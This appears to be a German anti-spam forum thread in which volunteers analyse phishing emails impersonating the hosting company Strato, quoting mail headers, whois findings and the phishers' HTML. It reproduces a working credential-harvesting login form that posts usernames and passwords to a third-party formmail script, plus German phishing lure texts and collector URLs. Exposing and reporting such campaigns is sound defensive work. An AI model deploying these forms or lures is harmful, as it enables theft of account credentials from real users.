Noch Fragen?Zitat von yokelplat
Noch Fragen?Zitat von yokelplat
Wir kriegen euch alle!
mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.
Tja den ersten Redirektor hat man dem Mugulein gekillt , da mus man halt weitermachen:
header:01: Received: from mo-p06-ob.rzone.de (EHLO mo-p06-ob.rzone.de) [81.169.146.186]02: by mx0.gmx.net (mx064) with SMTP; 16 Jul 2012 xx:xx:xx +020003: X-RZG-AUTH::LWckcUGrc/v2//LXhYp9NZBPuzREhM3px+vz7uHh5Q0Z95QhsjxEQa5/d92Gf6bKww==04: Message-ID: [ID filtered]05: X-RZG-CLASS-ID: [ID filtered]06: Received: from [184.22.221.130]07: (184-22-221-130.static.hostnoc.net [184.22.221.130])08: by smtp.strato.de (jored mo2) (RZmta 29.19 AUTH)09: with (DHE-RSA-AES256-SHA encrypted) ESMTPA ID: [ID filtered]10: Mon, 16 Jul 2012 xx:xx:xx +0200 (CEST)
gecrackt: [Link nur für registrierte Mitglieder sichtbar. ]
whois: [Link nur für registrierte Mitglieder sichtbar. ]
dann wieder weiter zur altbekannten Adresse. Spamcop leitet Reports an Inforelay gar nicht mehr weiter, scheint also ein altbekannter Schwarzhut zu sein.
mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.
Was für ein Honk:
[html]<form name="loginForm" method="POST" action="http://www.haisoft.net/webtools/formmail.php"> <input type=hidden name="recipient" value=" [Link nur für registrierte Mitglieder sichtbar. ]"> <input type=hidden name="subject" value="STRATO SCAMM - Powered By YOKELPLATFORM"> <input type=hidden name="redirect" value="http://users10.jabry.com/thankkkyoudanke/Redirect.htm">[/html]
Wie heise das so schön: "Friss Spammer, Friss!"
[Link nur für registrierte Mitglieder sichtbar. ]
[Link nur für registrierte Mitglieder sichtbar. ]
[Link nur für registrierte Mitglieder sichtbar. ]
[Link nur für registrierte Mitglieder sichtbar. ]
Villains who twirl their mustaches are easy to spot.
Those who cloak themselves in good deeds are well camouflaged.
Sokath! His eyes uncovered!
Der Kern seiner Seite ist folgender:
Damit kann man ihn kurzzeitig sehr glücklich machen. Im Rauschen plausibler Fehlschläge gehen die echten Treffer möglicherweise unter.Code:<html> <head> <title>Mugu-Phishing</title> </head> <body> <form name="loginForm" method="POST" action="http://www.haisoft.net/webtools/formmail.php"> <input type=hidden name="recipient" value=" [Link nur für registrierte Mitglieder sichtbar. ]"> <input type=hidden name="subject" value="STRATO SCAMM - Powered By YOKELPLATFORM"> User: <input name='login_user_inputbox' id='login_user_inputbox' type='text' class='textbox_input' tabindex='1' value=''> <br> Pass: <input name='login_pass_inputbox' type='password' class='textbox_input' id='login_pass_inputbox' tabindex='2' value=''> <br> <input type="submit" class="big_button" tabindex='3' title='Click here to log in.' value="LOGIN"> </form> </BODY> </HTML>
Wir kriegen euch alle!
Sehr schön, seine Phishingseiten sind tot und der Formmail-Betreiber hat ihn auch blockiert.
Dann muß er wohl wieder ran...
Wir kriegen euch alle!
Heute hier aufgeschlagen. Der Text in fürchterlichem Deutsch mit Einstreuungen kyrillischer Buchstaben verfasst.
[HTML]<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY bgcolor=#FFFFFF leftmargin=5 topmargin=5 rightmargin=5 bottommargin=5>
<FONT size=2 color=#000000 face="Arial">
<DIV>
<IMG align=baseline border=0 width=168 height=38 src="cid:00B5F17C20F8$0085F805$0100007f@icouvidmuumlgbb"></DIV>
<DIV>
<B>Lieber Kontoinhaber,</B></DIV>
<DIV>
<B>Wir sind derzeit in Kontofьhrung Dienst beschдftigt.</B></DIV>
<DIV>
<B>Als Kontoinhaber, sind Sie verpflichtet, Ihre kontinuierliche Mitgliedschaft zu bestдtigen.</B></DIV>
<DIV>
<B>Nichtbeachtung Ihre kontinuierliche Mitgliedschaft zu bestдtigen wird Aussetzen des Dienstes fьhren.</B></DIV>
<DIV>
<A href="http://ow.ly/hRFTr"><U>Ameldung zu aktualisieren und zu bestдtigen, in einem einfachen Schritt.</U></A></DIV>
<DIV>
<B>BITTE BEACHTEN SIE: Dies ist eine obligatorische MaЯnahme.</B></DIV>
<DIV>
<B>Danke</B></DIV>
<DIV>
<B>STRATO AG Admin Update ®</B></DIV>
<DIV>
<B>Copyright © 2013 STRATO AG</B></DIV>
</FONT>
</BODY></HTML>[/HTML]
header:01: Return-Path: wer_wohl_ich [at] web.de02: Received: from mout.web.de ([212.227.17.11]) by mx-ha.gmx.net (mxgmx005) with03: ESMTP (Nemesis) ID: [ID filtered]04: 2013 xx:xx:xx +010005: Received: from fep17.mx.upcmail.net ([62.179.121.37]) by mx-ha.web.de06: (mxweb005) with ESMTP (Nemesis) ID: [ID filtered]07: <auch_ich [at] gmx.de>; Tue, 19 Feb 2013 xx:xx:xx +010008: Received: from edge01.upcmail.net ([192.168.13.236])09: by viefep17-int.chello.at10: (InterMail vM.8.01.05.05 201-2260-151-110-20120111) with ESMTP11: ID: [ID filtered]12: Tue, 19 Feb 2013 xx:xx:xx +010013: Received: from User ([91.228.0.129])14: by edge01.upcmail.net with edge15: ID: [ID filtered]16: X-SourceIP: 91.228.0.12917: X-Authenticated-Sender: auch_ein_opfer [at] kabelbw.de18: From: "service [at] strato.de"<auch_ein_opferl [at] kabelbw.de>
Der Spam wurde über eine Server in Bischhofshofen eingestreut. whois:62.179.121.37
Gruß
Isenächer
Wider mal der Blöd-Ganove mit dem Mailanhang:
header:01: Received: from ae0000-mailfallback17.eo.k-opti.ad.jp ([203.140.81.46]) by02: mx-ha.gmx.net (mxgmx003) with ESMTP (Nemesis) ID: [ID filtered]03: Received: from mailout14.eonet.ne.jp (mailout01 [10.36.196.202]) by04: ae0000-mailfallback17.eo.k-opti.ad.jp (Postfix) with ESMTP ID: [ID filtered]05: Received: from ae0000-mailauth13.eo.k-opti.ad.jp (mailauth01 [10.36.196.204])06: by ae0000-mailout14.eo.k-opti.ad.jp (Postfix) with ESMTP ID: [ID filtered]07: Received: from ae0000-mailauth13.eo.k-opti.ad.jp (localhost.localdomain08: [127.0.0.1]) by ae0000-mailauth13.eo.k-opti.ad.jp (Postfix) with ESMTP ID: [ID09: filtered]10: Received: from User (mikerudd4.pndsl.co.uk [81.174.251.76]) by11: ae0000-mailauth13.eo.k-opti.ad.jp (Postfix) with ESMTP ID: [ID filtered]
Im Anhang: [HTML]<form method="POST" action="http://www.mcitv.ca/images/stories/de.php">[/HTML]Sehr geehrter Abonnent,
Wir arbeiten derzeit an der Kontofьhrung.
Als Abonnent sind Sie verpflichtet, Ihre fortgesetzte Mitgliedschaft
bestдtigen.
Aktualisieren Sie Ihr Konto bei uns jetzt.
verwenden Strato-Portal htm unten, um Ihr Konto zu aktualisieren
BITTE BEACHTEN SIE: Dies ist eine ZwangsmaЯnahme. Nichtbeachtung kann zu
Service-Suspension fьhren
Danke
STRATO AG Admin ®
© Deutsche STRATO AG 2013
IP: 97.74.221.90 ---> ip-97-74-221-90.ip.secureserver.net/Godaddy
mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.
Lesezeichen